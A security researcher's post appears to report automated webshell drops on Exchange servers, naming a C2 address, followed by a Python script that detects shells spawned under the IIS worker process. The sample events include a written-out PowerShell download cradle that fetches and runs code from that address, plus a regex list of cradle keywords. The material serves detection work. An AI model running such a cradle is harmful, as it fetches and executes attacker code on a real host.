@jhencinski | 8,431 followers
Seeing automated exploitation of Internet-facing Exchange servers to drop a webshell (working to confirm CVE#)
- exploit to deploy webshell
- w3wp.exe ➡️ CMD shell ➡️ PS download cradle
- c2: 86.105.18.116
Process tree below so folks can query / write detections
Also, update! https://t.co/mO1fmLfacQ
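The process tree in the tweet (w3wp.exe spawning cmd.exe, which launches a PowerShell download cradle) is the detection hook. Below is an added example, not code from the tweet or from any tool its author uses: a small Python detection run over constructed Sysmon-style process-creation records. The pids, image paths, the svchost.exe parent and the benign explorer.exe chain are assumptions made for the sample; only the w3wp.exe -> cmd.exe -> powershell.exe chain and the 86.105.18.116 address come from the tweet. The rule walks each shell process up to its ancestors, flags any shell under w3wp.exe (the broad hunting query), and raises severity when the command line carries a download cradle or the reported C2 address.

```python
import ntpath
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1-style records, trimmed to the fields the rule
# needs. Pids, paths and the benign events are assumptions; the chain
# w3wp.exe -> cmd.exe -> powershell.exe and the C2 address are from the tweet.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 700, "ppid": 4, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k iissvcs"},
    {"pid": 4100, "ppid": 700, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": r'c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool" -v "v4.0"'},
    {"pid": 5220, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://86.105.18.116/a')"},
    {"pid": 5301, "ppid": 5220, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://86.105.18.116/a')"},
    # Benign admin activity: same binaries, but no w3wp.exe in the ancestry.
    {"pid": 6000, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 6010, "ppid": 6000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 6020, "ppid": 6010, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Service MSExchangeIS"},
]

# Common PowerShell download-cradle primitives (assumed list, extend as needed).
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|"
    r"Invoke-Expression|\bIEX\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# Indicator reported in the tweet.
C2_INDICATORS = {"86.105.18.116"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_WORKER = "w3wp.exe"


def _image_name(image: str) -> str:
    """Lower-cased basename of a Windows image path (ntpath works on any OS)."""
    return ntpath.basename(image).lower()


def ancestry(by_pid: Dict[int, Dict], pid: int) -> List[str]:
    """Process names from pid up to the oldest known ancestor, child first.
    Stops at an unknown ppid or on a pid cycle (reused pids in real logs)."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(_image_name(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events: List[Dict]) -> List[Dict]:
    """Flag shells descended from w3wp.exe; escalate on cradle or C2 hits."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _image_name(e["image"]) not in SHELLS:
            continue
        chain = ancestry(by_pid, e["pid"])
        if WEB_WORKER not in chain:
            continue  # IIS worker is not an ancestor: not this pattern
        cradle = bool(CRADLE_RE.search(e["cmdline"]))
        iocs = sorted(i for i in C2_INDICATORS if i in e["cmdline"])
        alerts.append({
            "pid": e["pid"],
            "chain": list(reversed(chain)),  # root first, for readability
            "cradle": cradle,
            "iocs": iocs,
            "severity": "high" if (cradle or iocs) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["pid"], " -> ".join(a["chain"]), a["iocs"])
```

The medium tier deliberately fires on any cmd.exe or PowerShell under w3wp.exe, because on an Exchange server that ancestry alone is rare enough to hunt on; the cradle regex and IOC match only raise the priority, so a renamed or obfuscated cradle still surfaces.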